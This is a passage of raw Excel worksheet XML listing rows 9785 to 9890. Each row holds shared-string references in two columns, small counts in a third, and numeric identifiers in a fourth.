      </c>
      <c r="B9785" t="s">
        <v>16217</v>
      </c>
      <c r="C9785">
        <v>17</v>
      </c>
      <c r="D9785">
        <v>2335</v>
      </c>
    </row>
    <row r="9786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9786" t="s">
        <v>16231</v>
      </c>
      <c r="B9786" t="s">
        <v>16218</v>
      </c>
      <c r="C9786">
        <v>1</v>
      </c>
      <c r="D9786">
        <v>2335</v>
      </c>
    </row>
    <row r="9787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9787" t="s">
        <v>16228</v>
      </c>
      <c r="B9787" t="s">
        <v>16211</v>
      </c>
      <c r="C9787">
        <v>0</v>
      </c>
      <c r="D9787">
        <v>4801</v>
      </c>
    </row>
    <row r="9788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9788" t="s">
        <v>16231</v>
      </c>
      <c r="B9788" t="s">
        <v>16212</v>
      </c>
      <c r="C9788">
        <v>0</v>
      </c>
      <c r="D9788">
        <v>4801</v>
      </c>
    </row>
    <row r="9789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9789" t="s">
        <v>16228</v>
      </c>
      <c r="B9789" t="s">
        <v>16213</v>
      </c>
      <c r="C9789">
        <v>0</v>
      </c>
      <c r="D9789">
        <v>4801</v>
      </c>
    </row>
    <row r="9790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9790" t="s">
        <v>16231</v>
      </c>
      <c r="B9790" t="s">
        <v>16214</v>
      </c>
      <c r="C9790">
        <v>0</v>
      </c>
      <c r="D9790">
        <v>4801</v>
      </c>
    </row>
    <row r="9791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9791" t="s">
        <v>16228</v>
      </c>
      <c r="B9791" t="s">
        <v>16215</v>
      </c>
      <c r="C9791">
        <v>6</v>
      </c>
      <c r="D9791">
        <v>4801</v>
      </c>
    </row>
    <row r="9792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9792" t="s">
        <v>16231</v>
      </c>
      <c r="B9792" t="s">
        <v>16216</v>
      </c>
      <c r="C9792">
        <v>4</v>
      </c>
      <c r="D9792">
        <v>4801</v>
      </c>
    </row>
    <row r="9793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9793" t="s">
        <v>16228</v>
      </c>
      <c r="B9793" t="s">
        <v>16217</v>
      </c>
      <c r="C9793">
        <v>0</v>
      </c>
      <c r="D9793">
        <v>4801</v>
      </c>
    </row>
    <row r="9794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9794" t="s">
        <v>16231</v>
      </c>
      <c r="B9794" t="s">
        <v>16218</v>
      </c>
      <c r="C9794">
        <v>0</v>
      </c>
      <c r="D9794">
        <v>4801</v>
      </c>
    </row>
    <row r="9795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9795" t="s">
        <v>16229</v>
      </c>
      <c r="B9795" t="s">
        <v>16219</v>
      </c>
      <c r="C9795">
        <v>0</v>
      </c>
      <c r="D9795">
        <v>4801</v>
      </c>
    </row>
    <row r="9796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9796" t="s">
        <v>16230</v>
      </c>
      <c r="B9796" t="s">
        <v>16220</v>
      </c>
      <c r="C9796">
        <v>0</v>
      </c>
      <c r="D9796">
        <v>4801</v>
      </c>
    </row>
    <row r="9797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9797" t="s">
        <v>16229</v>
      </c>
      <c r="B9797" t="s">
        <v>16221</v>
      </c>
      <c r="C9797">
        <v>20</v>
      </c>
      <c r="D9797">
        <v>4801</v>
      </c>
    </row>
    <row r="9798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9798" t="s">
        <v>16230</v>
      </c>
      <c r="B9798" t="s">
        <v>16222</v>
      </c>
      <c r="C9798">
        <v>40</v>
      </c>
      <c r="D9798">
        <v>4801</v>
      </c>
    </row>
    <row r="9799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9799" t="s">
        <v>16223</v>
      </c>
      <c r="B9799" t="s">
        <v>16223</v>
      </c>
      <c r="C9799">
        <v>24</v>
      </c>
      <c r="D9799">
        <v>4801</v>
      </c>
    </row>
    <row r="9800" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9800" t="s">
        <v>16224</v>
      </c>
      <c r="B9800" t="s">
        <v>16224</v>
      </c>
      <c r="C9800">
        <v>0</v>
      </c>
      <c r="D9800">
        <v>4801</v>
      </c>
    </row>
    <row r="9801" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9801" t="s">
        <v>16228</v>
      </c>
      <c r="B9801" t="s">
        <v>16211</v>
      </c>
      <c r="C9801">
        <v>0</v>
      </c>
      <c r="D9801">
        <v>4790</v>
      </c>
    </row>
    <row r="9802" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9802" t="s">
        <v>16231</v>
      </c>
      <c r="B9802" t="s">
        <v>16212</v>
      </c>
      <c r="C9802">
        <v>0</v>
      </c>
      <c r="D9802">
        <v>4790</v>
      </c>
    </row>
    <row r="9803" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9803" t="s">
        <v>16228</v>
      </c>
      <c r="B9803" t="s">
        <v>16213</v>
      </c>
      <c r="C9803">
        <v>0</v>
      </c>
      <c r="D9803">
        <v>4790</v>
      </c>
    </row>
    <row r="9804" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9804" t="s">
        <v>16231</v>
      </c>
      <c r="B9804" t="s">
        <v>16214</v>
      </c>
      <c r="C9804">
        <v>0</v>
      </c>
      <c r="D9804">
        <v>4790</v>
      </c>
    </row>
    <row r="9805" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9805" t="s">
        <v>16228</v>
      </c>
      <c r="B9805" t="s">
        <v>16215</v>
      </c>
      <c r="C9805">
        <v>5</v>
      </c>
      <c r="D9805">
        <v>4790</v>
      </c>
    </row>
    <row r="9806" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9806" t="s">
        <v>16231</v>
      </c>
      <c r="B9806" t="s">
        <v>16216</v>
      </c>
      <c r="C9806">
        <v>10</v>
      </c>
      <c r="D9806">
        <v>4790</v>
      </c>
    </row>
    <row r="9807" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9807" t="s">
        <v>16228</v>
      </c>
      <c r="B9807" t="s">
        <v>16217</v>
      </c>
      <c r="C9807">
        <v>31</v>
      </c>
      <c r="D9807">
        <v>4790</v>
      </c>
    </row>
    <row r="9808" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9808" t="s">
        <v>16231</v>
      </c>
      <c r="B9808" t="s">
        <v>16218</v>
      </c>
      <c r="C9808">
        <v>6</v>
      </c>
      <c r="D9808">
        <v>4790</v>
      </c>
    </row>
    <row r="9809" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9809" t="s">
        <v>16229</v>
      </c>
      <c r="B9809" t="s">
        <v>16219</v>
      </c>
      <c r="C9809">
        <v>1</v>
      </c>
      <c r="D9809">
        <v>4790</v>
      </c>
    </row>
    <row r="9810" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9810" t="s">
        <v>16230</v>
      </c>
      <c r="B9810" t="s">
        <v>16220</v>
      </c>
      <c r="C9810">
        <v>1</v>
      </c>
      <c r="D9810">
        <v>4790</v>
      </c>
    </row>
    <row r="9811" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9811" t="s">
        <v>16229</v>
      </c>
      <c r="B9811" t="s">
        <v>16221</v>
      </c>
      <c r="C9811">
        <v>91</v>
      </c>
      <c r="D9811">
        <v>4790</v>
      </c>
    </row>
    <row r="9812" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9812" t="s">
        <v>16230</v>
      </c>
      <c r="B9812" t="s">
        <v>16222</v>
      </c>
      <c r="C9812">
        <v>41</v>
      </c>
      <c r="D9812">
        <v>4790</v>
      </c>
    </row>
    <row r="9813" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9813" t="s">
        <v>16223</v>
      </c>
      <c r="B9813" t="s">
        <v>16223</v>
      </c>
      <c r="C9813">
        <v>25</v>
      </c>
      <c r="D9813">
        <v>4790</v>
      </c>
    </row>
    <row r="9814" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9814" t="s">
        <v>16224</v>
      </c>
      <c r="B9814" t="s">
        <v>16224</v>
      </c>
      <c r="C9814">
        <v>1</v>
      </c>
      <c r="D9814">
        <v>4790</v>
      </c>
    </row>
    <row r="9815" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9815" t="s">
        <v>16228</v>
      </c>
      <c r="B9815" t="s">
        <v>16211</v>
      </c>
      <c r="C9815">
        <v>0</v>
      </c>
      <c r="D9815">
        <v>4830</v>
      </c>
    </row>
    <row r="9816" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9816" t="s">
        <v>16231</v>
      </c>
      <c r="B9816" t="s">
        <v>16212</v>
      </c>
      <c r="C9816">
        <v>0</v>
      </c>
      <c r="D9816">
        <v>4830</v>
      </c>
    </row>
    <row r="9817" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9817" t="s">
        <v>16228</v>
      </c>
      <c r="B9817" t="s">
        <v>16213</v>
      </c>
      <c r="C9817">
        <v>0</v>
      </c>
      <c r="D9817">
        <v>4830</v>
      </c>
    </row>
    <row r="9818" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9818" t="s">
        <v>16231</v>
      </c>
      <c r="B9818" t="s">
        <v>16214</v>
      </c>
      <c r="C9818">
        <v>0</v>
      </c>
      <c r="D9818">
        <v>4830</v>
      </c>
    </row>
    <row r="9819" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9819" t="s">
        <v>16228</v>
      </c>
      <c r="B9819" t="s">
        <v>16215</v>
      </c>
      <c r="C9819">
        <v>25</v>
      </c>
      <c r="D9819">
        <v>4830</v>
      </c>
    </row>
    <row r="9820" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9820" t="s">
        <v>16231</v>
      </c>
      <c r="B9820" t="s">
        <v>16216</v>
      </c>
      <c r="C9820">
        <v>12</v>
      </c>
      <c r="D9820">
        <v>4830</v>
      </c>
    </row>
    <row r="9821" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9821" t="s">
        <v>16228</v>
      </c>
      <c r="B9821" t="s">
        <v>16217</v>
      </c>
      <c r="C9821">
        <v>3</v>
      </c>
      <c r="D9821">
        <v>4830</v>
      </c>
    </row>
    <row r="9822" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9822" t="s">
        <v>16231</v>
      </c>
      <c r="B9822" t="s">
        <v>16218</v>
      </c>
      <c r="C9822">
        <v>7</v>
      </c>
      <c r="D9822">
        <v>4830</v>
      </c>
    </row>
    <row r="9823" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9823" t="s">
        <v>16229</v>
      </c>
      <c r="B9823" t="s">
        <v>16219</v>
      </c>
      <c r="C9823">
        <v>0</v>
      </c>
      <c r="D9823">
        <v>4830</v>
      </c>
    </row>
    <row r="9824" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9824" t="s">
        <v>16230</v>
      </c>
      <c r="B9824" t="s">
        <v>16220</v>
      </c>
      <c r="C9824">
        <v>0</v>
      </c>
      <c r="D9824">
        <v>4830</v>
      </c>
    </row>
    <row r="9825" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9825" t="s">
        <v>16229</v>
      </c>
      <c r="B9825" t="s">
        <v>16221</v>
      </c>
      <c r="C9825">
        <v>0</v>
      </c>
      <c r="D9825">
        <v>4830</v>
      </c>
    </row>
    <row r="9826" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9826" t="s">
        <v>16230</v>
      </c>
      <c r="B9826" t="s">
        <v>16222</v>
      </c>
      <c r="C9826">
        <v>0</v>
      </c>
      <c r="D9826">
        <v>4830</v>
      </c>
    </row>
    <row r="9827" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9827" t="s">
        <v>16223</v>
      </c>
      <c r="B9827" t="s">
        <v>16223</v>
      </c>
      <c r="C9827">
        <v>0</v>
      </c>
      <c r="D9827">
        <v>4830</v>
      </c>
    </row>
    <row r="9828" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9828" t="s">
        <v>16224</v>
      </c>
      <c r="B9828" t="s">
        <v>16224</v>
      </c>
      <c r="C9828">
        <v>0</v>
      </c>
      <c r="D9828">
        <v>4830</v>
      </c>
    </row>
    <row r="9829" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9829" t="s">
        <v>16228</v>
      </c>
      <c r="B9829" t="s">
        <v>16211</v>
      </c>
      <c r="C9829">
        <v>0</v>
      </c>
      <c r="D9829">
        <v>1126</v>
      </c>
    </row>
    <row r="9830" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9830" t="s">
        <v>16231</v>
      </c>
      <c r="B9830" t="s">
        <v>16212</v>
      </c>
      <c r="C9830">
        <v>0</v>
      </c>
      <c r="D9830">
        <v>1126</v>
      </c>
    </row>
    <row r="9831" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9831" t="s">
        <v>16228</v>
      </c>
      <c r="B9831" t="s">
        <v>16213</v>
      </c>
      <c r="C9831">
        <v>0</v>
      </c>
      <c r="D9831">
        <v>1126</v>
      </c>
    </row>
    <row r="9832" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9832" t="s">
        <v>16231</v>
      </c>
      <c r="B9832" t="s">
        <v>16214</v>
      </c>
      <c r="C9832">
        <v>0</v>
      </c>
      <c r="D9832">
        <v>1126</v>
      </c>
    </row>
    <row r="9833" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9833" t="s">
        <v>16228</v>
      </c>
      <c r="B9833" t="s">
        <v>16215</v>
      </c>
      <c r="C9833">
        <v>2</v>
      </c>
      <c r="D9833">
        <v>1126</v>
      </c>
    </row>
    <row r="9834" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9834" t="s">
        <v>16231</v>
      </c>
      <c r="B9834" t="s">
        <v>16216</v>
      </c>
      <c r="C9834">
        <v>2</v>
      </c>
      <c r="D9834">
        <v>1126</v>
      </c>
    </row>
    <row r="9835" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9835" t="s">
        <v>16228</v>
      </c>
      <c r="B9835" t="s">
        <v>16217</v>
      </c>
      <c r="C9835">
        <v>1</v>
      </c>
      <c r="D9835">
        <v>1126</v>
      </c>
    </row>
    <row r="9836" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9836" t="s">
        <v>16231</v>
      </c>
      <c r="B9836" t="s">
        <v>16218</v>
      </c>
      <c r="C9836">
        <v>1</v>
      </c>
      <c r="D9836">
        <v>1126</v>
      </c>
    </row>
    <row r="9837" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9837" t="s">
        <v>16229</v>
      </c>
      <c r="B9837" t="s">
        <v>16219</v>
      </c>
      <c r="C9837">
        <v>0</v>
      </c>
      <c r="D9837">
        <v>1126</v>
      </c>
    </row>
    <row r="9838" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9838" t="s">
        <v>16230</v>
      </c>
      <c r="B9838" t="s">
        <v>16220</v>
      </c>
      <c r="C9838">
        <v>0</v>
      </c>
      <c r="D9838">
        <v>1126</v>
      </c>
    </row>
    <row r="9839" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9839" t="s">
        <v>16229</v>
      </c>
      <c r="B9839" t="s">
        <v>16221</v>
      </c>
      <c r="C9839">
        <v>7</v>
      </c>
      <c r="D9839">
        <v>1126</v>
      </c>
    </row>
    <row r="9840" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9840" t="s">
        <v>16230</v>
      </c>
      <c r="B9840" t="s">
        <v>16222</v>
      </c>
      <c r="C9840">
        <v>13</v>
      </c>
      <c r="D9840">
        <v>1126</v>
      </c>
    </row>
    <row r="9841" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9841" t="s">
        <v>16223</v>
      </c>
      <c r="B9841" t="s">
        <v>16223</v>
      </c>
      <c r="C9841">
        <v>25</v>
      </c>
      <c r="D9841">
        <v>1126</v>
      </c>
    </row>
    <row r="9842" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9842" t="s">
        <v>16224</v>
      </c>
      <c r="B9842" t="s">
        <v>16224</v>
      </c>
      <c r="C9842">
        <v>1</v>
      </c>
      <c r="D9842">
        <v>1126</v>
      </c>
    </row>
    <row r="9843" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9843" t="s">
        <v>16228</v>
      </c>
      <c r="B9843" t="s">
        <v>16211</v>
      </c>
      <c r="C9843">
        <v>0</v>
      </c>
      <c r="D9843">
        <v>1970</v>
      </c>
    </row>
    <row r="9844" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9844" t="s">
        <v>16231</v>
      </c>
      <c r="B9844" t="s">
        <v>16212</v>
      </c>
      <c r="C9844">
        <v>0</v>
      </c>
      <c r="D9844">
        <v>1970</v>
      </c>
    </row>
    <row r="9845" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9845" t="s">
        <v>16228</v>
      </c>
      <c r="B9845" t="s">
        <v>16213</v>
      </c>
      <c r="C9845">
        <v>1</v>
      </c>
      <c r="D9845">
        <v>1970</v>
      </c>
    </row>
    <row r="9846" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9846" t="s">
        <v>16231</v>
      </c>
      <c r="B9846" t="s">
        <v>16214</v>
      </c>
      <c r="C9846">
        <v>1</v>
      </c>
      <c r="D9846">
        <v>1970</v>
      </c>
    </row>
    <row r="9847" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9847" t="s">
        <v>16228</v>
      </c>
      <c r="B9847" t="s">
        <v>16215</v>
      </c>
      <c r="C9847">
        <v>2</v>
      </c>
      <c r="D9847">
        <v>1970</v>
      </c>
    </row>
    <row r="9848" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9848" t="s">
        <v>16231</v>
      </c>
      <c r="B9848" t="s">
        <v>16216</v>
      </c>
      <c r="C9848">
        <v>2</v>
      </c>
      <c r="D9848">
        <v>1970</v>
      </c>
    </row>
    <row r="9849" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9849" t="s">
        <v>16228</v>
      </c>
      <c r="B9849" t="s">
        <v>16217</v>
      </c>
      <c r="C9849">
        <v>2</v>
      </c>
      <c r="D9849">
        <v>1970</v>
      </c>
    </row>
    <row r="9850" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9850" t="s">
        <v>16231</v>
      </c>
      <c r="B9850" t="s">
        <v>16218</v>
      </c>
      <c r="C9850">
        <v>2</v>
      </c>
      <c r="D9850">
        <v>1970</v>
      </c>
    </row>
    <row r="9851" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9851" t="s">
        <v>16229</v>
      </c>
      <c r="B9851" t="s">
        <v>16219</v>
      </c>
      <c r="C9851">
        <v>1</v>
      </c>
      <c r="D9851">
        <v>1970</v>
      </c>
    </row>
    <row r="9852" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9852" t="s">
        <v>16230</v>
      </c>
      <c r="B9852" t="s">
        <v>16220</v>
      </c>
      <c r="C9852">
        <v>1</v>
      </c>
      <c r="D9852">
        <v>1970</v>
      </c>
    </row>
    <row r="9853" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9853" t="s">
        <v>16229</v>
      </c>
      <c r="B9853" t="s">
        <v>16221</v>
      </c>
      <c r="C9853">
        <v>1</v>
      </c>
      <c r="D9853">
        <v>1970</v>
      </c>
    </row>
    <row r="9854" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9854" t="s">
        <v>16230</v>
      </c>
      <c r="B9854" t="s">
        <v>16222</v>
      </c>
      <c r="C9854">
        <v>1</v>
      </c>
      <c r="D9854">
        <v>1970</v>
      </c>
    </row>
    <row r="9855" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9855" t="s">
        <v>16223</v>
      </c>
      <c r="B9855" t="s">
        <v>16223</v>
      </c>
      <c r="C9855">
        <v>7</v>
      </c>
      <c r="D9855">
        <v>1970</v>
      </c>
    </row>
    <row r="9856" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9856" t="s">
        <v>16224</v>
      </c>
      <c r="B9856" t="s">
        <v>16224</v>
      </c>
      <c r="C9856">
        <v>2</v>
      </c>
      <c r="D9856">
        <v>1970</v>
      </c>
    </row>
    <row r="9857" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9857" t="s">
        <v>16228</v>
      </c>
      <c r="B9857" t="s">
        <v>16211</v>
      </c>
      <c r="C9857">
        <v>0</v>
      </c>
      <c r="D9857">
        <v>4889</v>
      </c>
    </row>
    <row r="9858" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9858" t="s">
        <v>16231</v>
      </c>
      <c r="B9858" t="s">
        <v>16212</v>
      </c>
      <c r="C9858">
        <v>0</v>
      </c>
      <c r="D9858">
        <v>4889</v>
      </c>
    </row>
    <row r="9859" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9859" t="s">
        <v>16228</v>
      </c>
      <c r="B9859" t="s">
        <v>16213</v>
      </c>
      <c r="C9859">
        <v>0</v>
      </c>
      <c r="D9859">
        <v>4889</v>
      </c>
    </row>
    <row r="9860" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9860" t="s">
        <v>16231</v>
      </c>
      <c r="B9860" t="s">
        <v>16214</v>
      </c>
      <c r="C9860">
        <v>0</v>
      </c>
      <c r="D9860">
        <v>4889</v>
      </c>
    </row>
    <row r="9861" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9861" t="s">
        <v>16228</v>
      </c>
      <c r="B9861" t="s">
        <v>16215</v>
      </c>
      <c r="C9861">
        <v>0</v>
      </c>
      <c r="D9861">
        <v>4889</v>
      </c>
    </row>
    <row r="9862" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9862" t="s">
        <v>16231</v>
      </c>
      <c r="B9862" t="s">
        <v>16216</v>
      </c>
      <c r="C9862">
        <v>0</v>
      </c>
      <c r="D9862">
        <v>4889</v>
      </c>
    </row>
    <row r="9863" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9863" t="s">
        <v>16228</v>
      </c>
      <c r="B9863" t="s">
        <v>16217</v>
      </c>
      <c r="C9863">
        <v>0</v>
      </c>
      <c r="D9863">
        <v>4889</v>
      </c>
    </row>
    <row r="9864" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9864" t="s">
        <v>16231</v>
      </c>
      <c r="B9864" t="s">
        <v>16218</v>
      </c>
      <c r="C9864">
        <v>0</v>
      </c>
      <c r="D9864">
        <v>4889</v>
      </c>
    </row>
    <row r="9865" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9865" t="s">
        <v>16229</v>
      </c>
      <c r="B9865" t="s">
        <v>16219</v>
      </c>
      <c r="C9865">
        <v>0</v>
      </c>
      <c r="D9865">
        <v>4889</v>
      </c>
    </row>
    <row r="9866" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9866" t="s">
        <v>16230</v>
      </c>
      <c r="B9866" t="s">
        <v>16220</v>
      </c>
      <c r="C9866">
        <v>0</v>
      </c>
      <c r="D9866">
        <v>4889</v>
      </c>
    </row>
    <row r="9867" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9867" t="s">
        <v>16229</v>
      </c>
      <c r="B9867" t="s">
        <v>16221</v>
      </c>
      <c r="C9867">
        <v>0</v>
      </c>
      <c r="D9867">
        <v>4889</v>
      </c>
    </row>
    <row r="9868" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9868" t="s">
        <v>16230</v>
      </c>
      <c r="B9868" t="s">
        <v>16222</v>
      </c>
      <c r="C9868">
        <v>0</v>
      </c>
      <c r="D9868">
        <v>4889</v>
      </c>
    </row>
    <row r="9869" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9869" t="s">
        <v>16223</v>
      </c>
      <c r="B9869" t="s">
        <v>16223</v>
      </c>
      <c r="C9869">
        <v>0</v>
      </c>
      <c r="D9869">
        <v>4889</v>
      </c>
    </row>
    <row r="9870" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9870" t="s">
        <v>16224</v>
      </c>
      <c r="B9870" t="s">
        <v>16224</v>
      </c>
      <c r="C9870">
        <v>0</v>
      </c>
      <c r="D9870">
        <v>4889</v>
      </c>
    </row>
    <row r="9871" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9871" t="s">
        <v>16231</v>
      </c>
      <c r="B9871" t="s">
        <v>16216</v>
      </c>
      <c r="C9871">
        <v>3</v>
      </c>
      <c r="D9871">
        <v>4889</v>
      </c>
    </row>
    <row r="9872" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9872" t="s">
        <v>16228</v>
      </c>
      <c r="B9872" t="s">
        <v>16217</v>
      </c>
      <c r="C9872">
        <v>2</v>
      </c>
      <c r="D9872">
        <v>4889</v>
      </c>
    </row>
    <row r="9873" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9873" t="s">
        <v>16231</v>
      </c>
      <c r="B9873" t="s">
        <v>16218</v>
      </c>
      <c r="C9873">
        <v>1</v>
      </c>
      <c r="D9873">
        <v>4889</v>
      </c>
    </row>
    <row r="9874" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9874" t="s">
        <v>16229</v>
      </c>
      <c r="B9874" t="s">
        <v>16221</v>
      </c>
      <c r="C9874">
        <v>10</v>
      </c>
      <c r="D9874">
        <v>4889</v>
      </c>
    </row>
    <row r="9875" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9875" t="s">
        <v>16223</v>
      </c>
      <c r="B9875" t="s">
        <v>16223</v>
      </c>
      <c r="C9875">
        <v>24</v>
      </c>
      <c r="D9875">
        <v>4889</v>
      </c>
    </row>
    <row r="9876" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9876" t="s">
        <v>16228</v>
      </c>
      <c r="B9876" t="s">
        <v>16211</v>
      </c>
      <c r="C9876">
        <v>0</v>
      </c>
      <c r="D9876">
        <v>4876</v>
      </c>
    </row>
    <row r="9877" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9877" t="s">
        <v>16231</v>
      </c>
      <c r="B9877" t="s">
        <v>16212</v>
      </c>
      <c r="C9877">
        <v>0</v>
      </c>
      <c r="D9877">
        <v>4876</v>
      </c>
    </row>
    <row r="9878" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9878" t="s">
        <v>16228</v>
      </c>
      <c r="B9878" t="s">
        <v>16213</v>
      </c>
      <c r="C9878">
        <v>0</v>
      </c>
      <c r="D9878">
        <v>4876</v>
      </c>
    </row>
    <row r="9879" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9879" t="s">
        <v>16231</v>
      </c>
      <c r="B9879" t="s">
        <v>16214</v>
      </c>
      <c r="C9879">
        <v>0</v>
      </c>
      <c r="D9879">
        <v>4876</v>
      </c>
    </row>
    <row r="9880" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9880" t="s">
        <v>16228</v>
      </c>
      <c r="B9880" t="s">
        <v>16215</v>
      </c>
      <c r="C9880">
        <v>5</v>
      </c>
      <c r="D9880">
        <v>4876</v>
      </c>
    </row>
    <row r="9881" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9881" t="s">
        <v>16231</v>
      </c>
      <c r="B9881" t="s">
        <v>16216</v>
      </c>
      <c r="C9881">
        <v>0</v>
      </c>
      <c r="D9881">
        <v>4876</v>
      </c>
    </row>
    <row r="9882" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9882" t="s">
        <v>16228</v>
      </c>
      <c r="B9882" t="s">
        <v>16217</v>
      </c>
      <c r="C9882">
        <v>1</v>
      </c>
      <c r="D9882">
        <v>4876</v>
      </c>
    </row>
    <row r="9883" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9883" t="s">
        <v>16231</v>
      </c>
      <c r="B9883" t="s">
        <v>16218</v>
      </c>
      <c r="C9883">
        <v>0</v>
      </c>
      <c r="D9883">
        <v>4876</v>
      </c>
    </row>
    <row r="9884" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9884" t="s">
        <v>16229</v>
      </c>
      <c r="B9884" t="s">
        <v>16219</v>
      </c>
      <c r="C9884">
        <v>0</v>
      </c>
      <c r="D9884">
        <v>4876</v>
      </c>
    </row>
    <row r="9885" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9885" t="s">
        <v>16230</v>
      </c>
      <c r="B9885" t="s">
        <v>16220</v>
      </c>
      <c r="C9885">
        <v>0</v>
      </c>
      <c r="D9885">
        <v>4876</v>
      </c>
    </row>
    <row r="9886" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9886" t="s">
        <v>16229</v>
      </c>
      <c r="B9886" t="s">
        <v>16221</v>
      </c>
      <c r="C9886">
        <v>8</v>
      </c>
      <c r="D9886">
        <v>4876</v>
      </c>
    </row>
    <row r="9887" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9887" t="s">
        <v>16230</v>
      </c>
      <c r="B9887" t="s">
        <v>16222</v>
      </c>
      <c r="C9887">
        <v>0</v>
      </c>
      <c r="D9887">
        <v>4876</v>
      </c>
    </row>
    <row r="9888" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9888" t="s">
        <v>16223</v>
      </c>
      <c r="B9888" t="s">
        <v>16223</v>
      </c>
      <c r="C9888">
        <v>6</v>
      </c>
      <c r="D9888">
        <v>4876</v>
      </c>
    </row>
    <row r="9889" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9889" t="s">
        <v>16224</v>
      </c>
      <c r="B9889" t="s">
        <v>16224</v>
      </c>
      <c r="C9889">
        <v>1</v>
      </c>
      <c r="D9889">
        <v>4876</v>
      </c>
    </row>
    <row r="9890" spans="1:4" x14ac:dyDescent="0.2">
